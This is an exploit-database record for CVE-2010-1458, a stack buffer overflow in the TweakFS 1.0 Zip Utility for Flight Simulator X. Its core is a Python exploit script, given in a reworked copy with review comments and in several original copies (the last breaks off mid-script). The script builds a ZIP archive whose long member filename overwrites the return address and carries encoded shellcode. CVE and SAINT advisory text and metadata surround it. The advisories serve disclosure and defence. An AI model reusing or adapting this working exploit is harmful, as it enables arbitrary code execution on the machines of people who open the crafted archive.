ID PACKETSTORM:88670 Type packetstorm Reporter corelanc0d3r Modified 2010-04-20T00:00:00
Description
`# Exploit Title : TweakFS 1.0 (FSX Edition)
# CVE : CVE-2010-1458
# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026
# Date : April 7th, 2010
# Author : corelanc0d3r
# Bug found by : TecR0c
# Software Link : http://tweakfs.com/download/tweakfs_zip_fsx.zip
# Version : 1.0
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : Direct RET / SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
# Banner and status output. The lines are printed verbatim; print() with a
# single string argument produces the same output under Python 2 and 3.
banner_lines = (
    "|------------------------------------------------------------------|",
    "| __ __ |",
    "| _________ ________ / /___ _____ / /____ ____ _____ ___ |",
    "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |",
    "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |",
    "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |",
    "| |",
    "| http://www.corelan.be:8800 |",
    "| |",
    "|-------------------------------------------------[ EIP Hunters ]--|\n",
    " [+] Exploit for TweakFS 1.0 - only works on XP SP3",
    " [+] Preparing payload...",
)
for banner_line in banner_lines:
    print(banner_line)
# Minimal ZIP container for the oversized filename: a 30-byte local file
# header, a 46-byte central directory entry and a 22-byte end-of-central-
# directory record, all as raw little-endian bytes. Field notes below are
# read directly off the byte values.
#
# NOTE(review): between the mod-date (\xCE\x34) and the name length
# (\xe4\x0f) this local header carries 3 + 8 = 11 zero bytes, while the
# crc-32 / compressed-size / uncompressed-size fields total 12 (the central
# directory entry below does have 12). A strict parser would therefore read
# this local header's name length as 0x000F, not 0x0FE4. Presumably the
# target reads the central directory entry; confirm before "fixing" the
# padding, since eofcdf_header's offsets assume a 30-byte local header.
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"  # PK\3\4, version 0x0014, flags 0, method 0 (stored), time 0xACB7, date 0x34CE, zero padding begins
"\x00\x00\x00\x00\x00\x00\x00\x00"  # remaining zero padding (crc / sizes)
"\xe4\x0f"  # 0x0FE4 = 4068 = 4064 + len(".txt"): the filename length
"\x00\x00\x00")  # extra-field length 0 (plus one trailing zero; see note above)
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"  # PK\1\2, made-by 0x0014, needed 0x0014, flags 0, method 0, time 0xACB7, date 0x34CE
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # with the 3 zeros above: crc-32, compressed size, uncompressed size all 0
"\xe4\x0f"  # filename length 0x0FE4 = 4068, consistent with len(buff) at write time
"\x00\x00\x00\x00\x00\x00\x01\x00"  # extra length 0, comment length 0, disk number 0, internal attrs 0x0001
"\x24\x00\x00\x00\x00\x00\x00\x00")  # external attrs 0x00000024, local header offset 0
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"  # PK\5\6, disk 0, cd disk 0, 1 entry on disk, 1 entry total
"\x12\x10\x00\x00"  # central directory size 0x1012 = 4114 = 46 + 4068
"\x02\x10\x00\x00"  # central directory offset 0x1002 = 4098 = 30 + 4068
"\x00\x00")  # archive comment length 0
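# Payload that becomes the archive member's filename. Fixed offsets within
# buff (the early part is filled to `size` before the return address):
#   0..114    'A' filler
#   115..124  nop                 (original note: "nops + prepare loop")
#   125..149  getpc               (25 bytes)
#   150..     egg, then "\x77\x9F", then 'A' filler up to offset 272
#   272..275  ret                 (the "Direct RET" overwrite named in the header)
#   276..279  "\x41\x77\xA4\x42"  (original note: "jump back")
#   280..283  "\x3c\x44\x40\x00"  (embedded null byte, original note: no SEH)
#   284..291  "w00tw00t"
#   292..     MessageBox shellcode, 'C' filler to 4064, then ".txt"
# The ZIP headers hard-code the filename length as 0x0FE4 = 4068, so buff
# must end up exactly 4068 bytes long; the length is checked before the
# extension is appended instead of letting a negative repeat count silently
# produce an empty pad.
#egg esi, will jump to edi
egg = "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
egg += "avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A"
getpc="\x89\x05\x5e\x98\x99\x46\x46\x8a\x94\x98\x98\x98"
getpc += "\x74\x07\x46\x46\x49\x73\x97" #loop
getpc += "\x77\x85" #jump before getpc
getpc += "\x46\x41\x41\x41" #nops
nop="\x42\x42\x33\x90\x41\x41\x41\x41\x41\x41" #nops + prepare loop
size=272  # offset of the return-address overwrite
ret = "\x7C\x22\x48\x7E" # 0x7E48227C user32.dll XP SP3 (hard-coded, non-ASLR address: XP SP3 English only)
buff = "\x41" * (125-len(nop))
buff += nop + getpc + egg + "\x77\x9F" #jmp between getpc and egg
buff += "\x41" * (size-len(buff))
buff += ret
buff += "\x41\x77\xA4\x42" #jump back
buff += "\x3c\x44\x40\x00" # null byte to avoid writing over end of stack (no SEH)
buff += "w00tw00t"
#edi basereg - MessageBox shellcode
buff += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt"
buff += "qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1"
buff += "1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY"
buff += "PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz"
buff += "GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK"
buff += "9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU"
buff += "proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ"
buff += "xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x"
buff += "cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA"
buff += "\x43" * (4064-len(buff)) # 4064
# Guard: the headers declare a 4068-byte name, so anything else would
# desynchronise the local header, central directory and EOCD offsets.
if len(buff) != 4064:
    raise ValueError("payload is %d bytes before the extension, expected 4064" % len(buff))
buff += ".txt"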
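# Assemble the archive: local file header + name, central directory entry +
# name, end-of-central-directory record. The member name is the payload.
archive = ldf_header + buff + cdf_header + buff + eofcdf_header
out_name = 'corelanc0d3r_tweakfs.zip'
print(" [+] Writing payload to file " + out_name)
# Binary mode: a text-mode handle would rewrite any 0x0A byte as 0x0D 0x0A
# on Windows, silently corrupting a binary payload. The context manager
# closes the handle even if the write raises.
with open(out_name, 'wb') as mefile:
    mefile.write(archive)
# Report what was actually written (headers plus two copies of buff), not
# the length of a single buff.
print(" [+] Wrote " + str(len(archive)) + " bytes to file")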
`
{"reporter": "corelanc0d3r", "enchantments": {"score": {"value": 9.1, "vector": "NONE", "modified": "2016-12-05T22:11:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1458"]}, {"type": "saint", "idList": ["SAINT:4F99F60DD629C526E3DFB542329DB2B5", "SAINT:105EBB16924CB02164DDF6301CE70434", "SAINT:F8453FBB6FA9B98A6A0CDEB20E641EAC"]}, {"type": "seebug", "idList": ["SSV:68357"]}, {"type": "exploitdb", "idList": ["EDB-ID:12293"]}], "modified": "2016-12-05T22:11:34"}, "vulnersScore": 9.1}, "published": "2010-04-20T00:00:00", "lastseen": "2016-12-05T22:11:34", "cvelist": ["CVE-2010-1458"], "id": "PACKETSTORM:88670", "sourceHref": "https://packetstormsecurity.com/files/download/88670/corelanc0d3r_tweakfs_sploit.py.txt", "objectVersion": "1.2", "sourceData": "`# Exploit Title : TweakFS 1.0 (FSX Edition) \n# CVE : CVE-2010-1458 \n# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026 \n# Date : April 7th, 2010 \n# Author : corelanc0d3r \n# Bug found by : TecR0c \n# Software Link : http://tweakfs.com/download/tweakfs_zip_fsx.zip \n# Version : 1.0 \n# OS : Windows \n# Tested on : XP SP3 En (VirtualBox) \n# Type of vuln : Direct RET / SEH \n# Greetz to : Corelan Security Team \n# http://www.corelan.be:8800/index.php/security/corelan-team-members/ \n# \n# Script provided 'as is', without any warranty. \n# Use for educational purposes only. \n# Do not use this code to do anything illegal ! \n# Corelan does not want anyone to use this script \n# for malicious and/or illegal purposes. \n# Corelan cannot be held responsible for any illegal use. \n# \n# Note : you are not allowed to edit/modify this code. \n# If you do, Corelan cannot be held responsible for any damages this may cause. 
\n# \n# \n# Code : \nprint \"|------------------------------------------------------------------|\" \nprint \"| __ __ |\" \nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\" \nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\" \nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\" \nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\" \nprint \"| |\" \nprint \"| http://www.corelan.be:8800 |\" \nprint \"| |\" \nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\" \nprint \" [+] Exploit for TweakFS 1.0 - only works on XP SP3\"; \nprint \" [+] Preparing payload...\" \nldf_header = (\"\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\xe4\\x0f\" \n\"\\x00\\x00\\x00\") \n \ncdf_header = (\"\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\xe4\\x0f\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" \n\"\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00\") \n \neofcdf_header = (\"\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\" \n\"\\x12\\x10\\x00\\x00\" \n\"\\x02\\x10\\x00\\x00\" \n\"\\x00\\x00\") \n \n#egg esi, will jump to edi \negg = \"VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\" \negg += \"avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A\" \ngetpc=\"\\x89\\x05\\x5e\\x98\\x99\\x46\\x46\\x8a\\x94\\x98\\x98\\x98\" \ngetpc += \"\\x74\\x07\\x46\\x46\\x49\\x73\\x97\" #loop \ngetpc += \"\\x77\\x85\" #jump before getpc \ngetpc += \"\\x46\\x41\\x41\\x41\" #nops \nnop=\"\\x42\\x42\\x33\\x90\\x41\\x41\\x41\\x41\\x41\\x41\" #nops + prepare loop \nsize=272 \n \nret = \"\\x7C\\x22\\x48\\x7E\" # 0x7E48227C user32.dll XP SP3 \nbuff = \"\\x41\" * (125-len(nop)) \nbuff += nop + getpc + egg + \"\\x77\\x9F\" #jmp 
between getpc and egg \nbuff += \"\\x41\" * (size-len(buff)) \nbuff += ret \nbuff += \"\\x41\\x77\\xA4\\x42\" #jump back \nbuff += \"\\x3c\\x44\\x40\\x00\" # null byte to avoid writing over end of stack (no SEH) \nbuff += \"w00tw00t\" \n#edi basereg - MessageBox shellcode \nbuff += \"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt\" \nbuff += \"qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1\" \nbuff += \"1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY\" \nbuff += \"PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz\" \nbuff += \"GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK\" \nbuff += \"9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU\" \nbuff += \"proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ\" \nbuff += \"xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x\" \nbuff += \"cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA\" \nbuff += \"\\x43\" * (4064-len(buff)) # 4064 \nbuff += \".txt\" \n \n \nprint \" [+] Writing payload to file corelanc0d3r_tweakfs.zip\" \nmefile = open('corelanc0d3r_tweakfs.zip','w'); \nmefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); \nmefile.close() \nprint \" [+] Wrote \" + str(len(buff))+ \" bytes to file\" \n`\n", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "description": "", "references": [], "hash": "9d8c806c7715958a59513e952be4e3aab76797b879884d21b577a41445349fe5", "edition": 1, "title": "TweakFS 1.0 Stack Buffer Overflow", "type": "packetstorm", "modified": "2010-04-20T00:00:00", "history": [], "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "fe0aae2c416335693d170b32dff4f15f", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, 
{"hash": "e178d9305e7253bd9f3bcbb4594845f9", "key": "href"}, {"hash": "e9b31838614598f5e8d84c3e324edec8", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "e9b31838614598f5e8d84c3e324edec8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5dab027692baf2e26c944518885cfa86", "key": "reporter"}, {"hash": "e6311dc39d69fd014ae1d0cbd01c5aec", "key": "sourceData"}, {"hash": "a2acb891a31645f6ab78cf9d1a6844d0", "key": "sourceHref"}, {"hash": "55dae3022f0ddbfb6075893289c9ee1d", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/88670/TweakFS-1.0-Stack-Buffer-Overflow.html", "viewCount": 1}
{"cve": [{"lastseen": "2019-05-29T18:10:27", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Create and Extract Zips TweakFS Zip Utility 1.0 for Flight Simulator X (FSX) allows remote attackers to execute arbitrary code via a long filename in a ZIP archive.", "modified": "2017-08-17T01:32:00", "id": "CVE-2010-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1458", "published": "2010-04-20T16:30:00", "title": "CVE-2010-1458", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "description": "Added: 06/24/2010 \nCVE: [CVE-2010-1458](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1458>) \nBID: [39565](<http://www.securityfocus.com/bid/39565>) \nOSVDB: [63899](<http://www.osvdb.org/63899>) \n\n\n### Background\n\nThe [TweakFS Zip Utility](<http://www.tweakfs.com>) is included in the TweakFS Flight Simulator X Utilities. \n\n### Problem\n\nA buffer overflow vulnerability in the TweakFS Zip Utility allows command execution when a user opens a ZIP archive containing a long, specially crafted filename. \n\n### Resolution\n\nDo not open untrusted ZIP files using the TweakFS Zip Utility. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0242.html> \n\n\n### Limitations\n\nExploit works on TweakFS Zip Utility 1.0 and requires a user to open the exploit file. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/tweakfs_zip_filename", "id": "SAINT:4F99F60DD629C526E3DFB542329DB2B5", "type": "saint", "title": "TweakFS Zip Utility for FSX filename buffer overflow", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 06/24/2010 \nCVE: [CVE-2010-1458](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1458>) \nBID: [39565](<http://www.securityfocus.com/bid/39565>) \nOSVDB: [63899](<http://www.osvdb.org/63899>) \n\n\n### Background\n\nThe [TweakFS Zip Utility](<http://www.tweakfs.com>) is included in the TweakFS Flight Simulator X Utilities. \n\n### Problem\n\nA buffer overflow vulnerability in the TweakFS Zip Utility allows command execution when a user opens a ZIP archive containing a long, specially crafted filename. \n\n### Resolution\n\nDo not open untrusted ZIP files using the TweakFS Zip Utility. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0242.html> \n\n\n### Limitations\n\nExploit works on TweakFS Zip Utility 1.0 and requires a user to open the exploit file. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "id": "SAINT:105EBB16924CB02164DDF6301CE70434", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/tweakfs_zip_filename", "type": "saint", "title": "TweakFS Zip Utility for FSX filename buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 06/24/2010 \nCVE: [CVE-2010-1458](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1458>) \nBID: [39565](<http://www.securityfocus.com/bid/39565>) \nOSVDB: [63899](<http://www.osvdb.org/63899>) \n\n\n### Background\n\nThe [TweakFS Zip Utility](<http://www.tweakfs.com>) is included in the TweakFS Flight Simulator X Utilities. \n\n### Problem\n\nA buffer overflow vulnerability in the TweakFS Zip Utility allows command execution when a user opens a ZIP archive containing a long, specially crafted filename. \n\n### Resolution\n\nDo not open untrusted ZIP files using the TweakFS Zip Utility. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0242.html> \n\n\n### Limitations\n\nExploit works on TweakFS Zip Utility 1.0 and requires a user to open the exploit file. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "id": "SAINT:F8453FBB6FA9B98A6A0CDEB20E641EAC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/tweakfs_zip_filename", "title": "TweakFS Zip Utility for FSX filename buffer overflow", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:25:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-68357", "id": "SSV:68357", "title": "TweakFS 1.0 (FSX Edition) Stack buffer overflow", "type": "seebug", "sourceData": "\n # Exploit Title : TweakFS 1.0 (FSX Edition)\r\n# CVE : CVE-2010-1458\r\n# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026\r\n# Date : April 7th, 2010\r\n# Author : corelanc0d3r\r\n# Bug found by : TecR0c\r\n# Software Link : http://tweakfs.com/\r\n# Version : 1.0\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : Direct RET / SEH\r\n# Greetz to : Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes.\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. 
\r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n#\r\n# Code :\r\nprint "|------------------------------------------------------------------|"\r\nprint "| __ __ |"\r\nprint "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"\r\nprint "| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |"\r\nprint "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"\r\nprint "| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |"\r\nprint "| |"\r\nprint "| http://www.corelan.be:8800 |"\r\nprint "| |"\r\nprint "|-------------------------------------------------[ EIP Hunters ]--|\\n"\r\nprint " [+] Exploit for TweakFS 1.0 - only works on XP SP3";\r\nprint " [+] Preparing payload..."\r\nldf_header = ("\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\xe4\\x0f"\r\n"\\x00\\x00\\x00")\r\n\r\ncdf_header = ("\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\xe4\\x0f"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00"\r\n"\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00")\r\n\r\neofcdf_header = ("\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00"\r\n"\\x12\\x10\\x00\\x00" \r\n"\\x02\\x10\\x00\\x00" \r\n"\\x00\\x00")\r\n\r\n#egg esi, will jump to edi\r\negg = "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"\r\negg += "avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A"\r\ngetpc="\\x89\\x05\\x5e\\x98\\x99\\x46\\x46\\x8a\\x94\\x98\\x98\\x98"\r\ngetpc += "\\x74\\x07\\x46\\x46\\x49\\x73\\x97" #loop\r\ngetpc += "\\x77\\x85" #jump before getpc\r\ngetpc += "\\x46\\x41\\x41\\x41" #nops\r\nnop="\\x42\\x42\\x33\\x90\\x41\\x41\\x41\\x41\\x41\\x41" #nops + prepare loop\r\nsize=272\r\n\r\nret = "\\x7C\\x22\\x48\\x7E" # 0x7E48227C user32.dll XP SP3\r\nbuff = "\\x41" * 
(125-len(nop))\r\nbuff += nop + getpc + egg + "\\x77\\x9F" #jmp between getpc and egg\r\nbuff += "\\x41" * (size-len(buff))\r\nbuff += ret\r\nbuff += "\\x41\\x77\\xA4\\x42" #jump back\r\nbuff += "\\x3c\\x44\\x40\\x00" # null byte to avoid writing over end of stack (no SEH)\r\nbuff += "w00tw00t"\r\n#edi basereg - MessageBox shellcode\r\nbuff += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt"\r\nbuff += "qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1"\r\nbuff += "1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY"\r\nbuff += "PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz"\r\nbuff += "GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK"\r\nbuff += "9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU"\r\nbuff += "proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ"\r\nbuff += "xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x"\r\nbuff += "cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA"\r\nbuff += "\\x43" * (4064-len(buff)) # 4064\r\nbuff += ".txt"\r\n\r\n\r\nprint " [+] Writing payload to file corelanc0d3r_tweakfs.zip"\r\nmefile = open('corelanc0d3r_tweakfs.zip','w');\r\nmefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);\r\nmefile.close()\r\nprint " [+] Wrote " + str(len(buff))+ " bytes to file"\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-68357", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T16:09:39", "bulletinFamily": "exploit", "description": "TweakFS 1.0 (FSX Edition) Stack buffer overflow. CVE-2010-1458. 
Local exploit for windows platform", "modified": "2010-04-19T00:00:00", "published": "2010-04-19T00:00:00", "id": "EDB-ID:12293", "href": "https://www.exploit-db.com/exploits/12293/", "type": "exploitdb", "title": "TweakFS 1.0 FSX Edition Stack Buffer Overflow", "sourceData": "# Exploit Title : TweakFS 1.0 (FSX Edition)\r\n# CVE : CVE-2010-1458\r\n# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026\r\n# Date : April 7th, 2010\r\n# Author : corelanc0d3r\r\n# Bug found by : TecR0c\r\n# Software Link : http://tweakfs.com/\r\n# Version : 1.0\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : Direct RET / SEH\r\n# Greetz to : Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes.\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. 
\r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n#\r\n# Code :\r\nprint \"|------------------------------------------------------------------|\"\r\nprint \"| __ __ |\"\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\"\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\"\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\"\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\"\r\nprint \"| |\"\r\nprint \"| http://www.corelan.be:8800 |\"\r\nprint \"| |\"\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\"\r\nprint \" [+] Exploit for TweakFS 1.0 - only works on XP SP3\";\r\nprint \" [+] Preparing payload...\"\r\nldf_header = (\"\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xe4\\x0f\"\r\n\"\\x00\\x00\\x00\")\r\n\r\ncdf_header = (\"\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xe4\\x0f\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\"\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00\")\r\n\r\neofcdf_header = (\"\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\"\r\n\"\\x12\\x10\\x00\\x00\" 